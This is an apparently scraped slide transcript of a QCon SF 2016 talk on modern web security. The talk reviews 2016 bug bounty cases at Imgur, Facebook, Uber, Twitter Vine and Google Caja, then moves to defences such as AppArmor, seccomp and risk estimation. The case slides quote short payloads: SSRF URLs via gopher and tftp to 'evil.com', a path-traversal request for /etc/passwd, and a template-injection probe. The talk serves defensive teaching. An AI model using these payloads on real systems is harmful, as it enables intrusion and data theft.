Modern Web Security, Lazy but Mindful Like a Fox
0 likes625 views
The document discusses modern web security strategies showcased at QCon San Francisco 2016, emphasizing the importance of knowledge and innovation in software development. It covers various security vulnerabilities, bounty programs, and defenses employed by major tech companies like Facebook and Uber, along with insights into risk management and application security. The presentation also highlights practical security measures and advocates for effective communication of security contexts.
![Sample AppArmor profile for Docker
#include <tunables/global>
profile hardened flags=(attach_disconnected,mediate_deleted) {
#include <abstractions/base>
audit network,
audit capability,
audit file,
audit umount,
deny @{PROC}/{*,**^[0-9*],sys/kernel/shm*} wkx,
deny @{PROC}/sysrq-trigger rwklx,
deny @{PROC}/mem rwklx,
deny @{PROC}/kmem rwklx,
deny @{PROC}/kcore rwklx,
deny mount,
deny /sys/[^f]*/** wklx,
deny /sys/f[^s]*/** wklx,
deny /sys/fs/[^c]*/** wklx,
See: https://docs.docker.com/engine/security/apparmor/](https://image.slidesharecdn.com/untitled-161219103738/85/Modern-Web-Security-Lazy-but-Mindful-Like-a-Fox-57-320.jpg)
Modern Web Security, Lazy but Mindful Like a Fox
- 1. ALBERT YU • TRUST ENGINEERING • ATLASSIAN • @YUKINYING Modern Web Security Lazy but Mindful Like a Fox QCon SF 2016
- 2. InfoQ.com: News & Community Site • 750,000 unique visitors/month • Published in 4 languages (English, Chinese, Japanese and Brazilian Portuguese) • Post content from our QCon conferences • News 15-20 / week • Articles 3-4 / week • Presentations (videos) 12-15 / week • Interviews 2-3 / week • Books 1 / month Watch the video with slide synchronization on InfoQ.com! https://www.infoq.com/presentations/ security-defenses
- 3. Purpose of QCon - to empower software development by facilitating the spread of knowledge and innovation Strategy - practitioner-driven conference designed for YOU: influencers of change and innovation in your teams - speakers and topics driving the evolution and innovation - connecting and catalyzing the influencers and innovators Highlights - attended by more than 12,000 delegates since 2007 - held in 9 cities worldwide Presented at QCon San Francisco www.qconsf.com
- 4. // TODO: Security <!-- Fix this Build this
- 5. Who am I Speciality: Application security Previous: Paranoids @ Yahoo, 10+ years Current: Trust Engineering, Sr Principal @ Atlassian Leisure time: Cryptographic protocol analysis Goal: Make security easy and affordable for everyone
- 6. KNOWING YOURSELF KNOWING YOUR ENEMY MODERN SECURITY Agenda
- 8. To win without jeopardy, be familiar with yourself and your enemy. SUNZI, THE ART OF WAR “ ”
- 10. http://www.ifc0nfig.com/dominos-pizza-and- payments/ Paul Price, April 2016 Vendor: Domino Bounty: $0 Tool: Burp Proxy Pizza and Payments What’s wrong
- 11. Pizza and Payments What’s wrong 1. Mobile app used a payment provider 2. Provider sent payment verification to phone 3. Phone sent ordering reference back to the store “let's trust the client. The client never lies.” Paul Price
- 12. Imgur SSRF Background $2000 Bug https://hackerone.com/reports/115748 Eugene Farfel, Mar 2016 Vendor: Imgur Vulnerability: SSRF Bounty: $2000 Rewarded for extending SSRF to send spam emails. SSRF stands for Server Side Request Forgery.
- 13. Imgur SSRF Background $2000 Bug SSRF in /vidgif/url?url=xxx Translated into logic that runs curl with $url. URL is probably sanitized, but schema can be set to non-http protocol.
- 14. Imgur SSRF Background $2000 Bug The interesting part: SSRF with gopher protocol gopher://evil.com/foo%0Abar%0A => get translated to telnet like payload => Exploit: Redirect gopher url to SMTP server SSRF with tftp protocol tftp://evil.com/foo => get translated to UDP Author did not mention possibility of exploiting Redis. Leads to additional disclosure around July 2016 by other hackers.
- 15. Imgur Path Traversal $5000 Bug https://hackerone.com/reports/122475 Slim Shady, Apr 2016 Vendor: Imgur Bounty: $5000 http://imgur.com/edit/process? imageid=../../../../../../../../../../etc/passwd
- 17. http://devco.re/blog/2016/04/21/how-I-hacked- facebook-and-found-someones-backdoor-script-eng- ver/ Orange Tsai, April 2016 Vendor: Facebook Bounty: $10000 Facebook RCE Background $10000 Bug
- 18. tfbnw.net -> vpn.tfbnw.net -> files.fb.com Running a vendor software with 2 existing CVE Vulnerable system takes employee password Found 7 more exploits, 4 of them got CVE assigned *Found backdoors left by someone else* Facebook RCE Background $10000 Bug
- 19. Uber RCE Background $10000 Bug https://hackerone.com/reports/125980 http://blog.orange.tw/2016/04/bug-bounty-uber- ubercom-remote-code_7.html Orange Tsai, Apr 2016 Vendor: Uber Bounty: $10000
- 20. Uber RCE Background $10000 Bug String interpolation Template rendering All mixed up
- 21. Uber RCE Background $10000 Bug Only 7-byte payload is needed {{ 1+1 }}
- 22. Twitter Vine $10080 Bug https://avicoder.me/2016/07/22/Twitter-Vine-Source- code-dump/ @avicoder, July 2016 Vendor: Twitter Vine Bounty: $10080
- 23. Twitter Vine $10080 Bug https://censys.io -> https://docker.vineapp.com Source code API keys Third party keys
- 24. Caja Background $??? Bug http://blog.bentkowski.info/2016/07/xss-es-in- google-caja.html Michał Bentkowski, July 2016 Vendor: Google Bounty: ??? Knowledge: ECMASCRIPT 6 changes
- 25. Google’s implementation of “virtual sandbox iframe”, developed around 2008. Parse Javascript, HTML, CSS and regenerate the safe subset. It was one of the safest implementation… Caja Background $??? Bug
- 26. HTML5 first specification: 2008 Caja was started from HTML4 HTML comment parsing vs Javascript comment parsing ECMASCRIPT 6 added u{..} Caja Background $??? Bug
- 27. This is why Defense Attack
- 28. Knowing Yourself
- 29. Not knowing your enemy, a victory will always follow with another loss. SUNZI, THE ART OF WAR “ ”
- 30. How do we put up a good defense? http://webblaze.cs.berkeley.edu/papers/empirical-webfwks.pdf
- 31. Talking point 1 All about contexts (client side) Talking point 2 Supporting text should be kept short and to the point; Limit text to a maximum of 3 lines. Supporting text should be kept short and to the point; Limit text to a maximum of 3 lines.
- 33. All about contexts (server side)
- 34. All about contexts (server side)
- 35. Context - Facebook RCE via SQLi
- 36. Preparing SQL statements mysql> SET @table = 't1'; mysql> SET @s = CONCAT('SELECT * FROM ', @table); mysql> PREPARE stmt3 FROM @s; http://dev.mysql.com/doc/refman/5.7/en/sql-syntax-prepared-statements.html
- 37. Context - Uber RCE via tempting (DSL)
- 38. Context - Imgur SSRF
- 39. Red team always win
- 51. The Chain
- 52. Standing on the Shoulders of Giants
- 54. OS sandboxing Seccomp (Secure Computing Mode) • Sandboxing in Kernel • Seccomp-BPF for sys calls Setcap • grant fine grained privilege to binary for non-sudo user AppArmor • Mandatory Access Control on processes • Audit mode support • Docker comes with AppArmor out of the box
- 57. Sample AppArmor profile for Docker #include <tunables/global> profile hardened flags=(attach_disconnected,mediate_deleted) { #include <abstractions/base> audit network, audit capability, audit file, audit umount, deny @{PROC}/{*,**^[0-9*],sys/kernel/shm*} wkx, deny @{PROC}/sysrq-trigger rwklx, deny @{PROC}/mem rwklx, deny @{PROC}/kmem rwklx, deny @{PROC}/kcore rwklx, deny mount, deny /sys/[^f]*/** wklx, deny /sys/f[^s]*/** wklx, deny /sys/fs/[^c]*/** wklx, See: https://docs.docker.com/engine/security/apparmor/
- 62. IPSet • IPTables extension • Set representations for • multiple IPs or subnets • can combine with ports, etc • as bitmap or hash
- 64. Risk Management
- 65. “Consider a sequence of trials, where each trial has only two possible outcomes, (designated failure and success). The probability of success is assumed to be the same for each trial. The distribution gives the probability that there are zero failures before the first success, one failure before the first success, two failures before the first success, and so on…” “the expected (mean) number of failures before the first success is… ” https://en.wikipedia.org/wiki/Geometric_distribution Risk Likelihood Do the Maths Risk = Likelihood x Impact ? Tuning the Risk
- 66. Risk Likelihood Do the Maths Tuning the Risk
- 67. Risk Likelihood Do the Maths Tuning the Risk blackhat-day t=7 t=69 t=693
- 68. Risk Likelihood Do the Maths Reality Negative indicators 1. Bigger assets attract more skillful attackers Positive indicators 1. Number of lateral movements required 2. Coverage 3. Speed to response Tuning the Risk
- 70. Modern Security Response in Realtime Defensive in Depth
- 71. Modern Security Mandating Practical Security Response in Realtime Defensive in Depth
- 73. Derek Chamorro Jason Fesler Stuart Larsen Kudos
- 74. Maze: https://www.flickr.com/photos/61287964@N00/5837800805 by John Smith Maze: https://www.flickr.com/photos/wwworks/2786242106 by woodleywonderworks Giant: https://www.flickr.com/photos/tuncaycoskun/15158934316 by Tuncay Firing range: https://www.flickr.com/photos/bwjones/2285449364/ by Bryan Jones Firewall: https://www.flickr.com/photos/ecastro/3352213726/ by Eric E Castro The return of Boba Fett: https://www.flickr.com/photos/huguesndelafleche/7280224712 by Artamir78 Chains: https://www.flickr.com/photos/mecklenburg/11758871786 by Thomas Kohler SELinux: https://www.flickr.com/photos/pchow98/9667426636 by pchow98 Hacked printer: https://www.flickr.com/photos/girlgeek/1877517607/ by Jennie Risk: https://www.flickr.com/photos/jaredzimmerman/8212752926/ by Jared Zimmerman Creative Commons
- 75. Thank you! ALBERT YU • TRUST ENGINEERING • ATLASSIAN • @YUKINYING
- 76. Watch the video with slide synchronization on InfoQ.com! https://www.infoq.com/presentations/security- defenses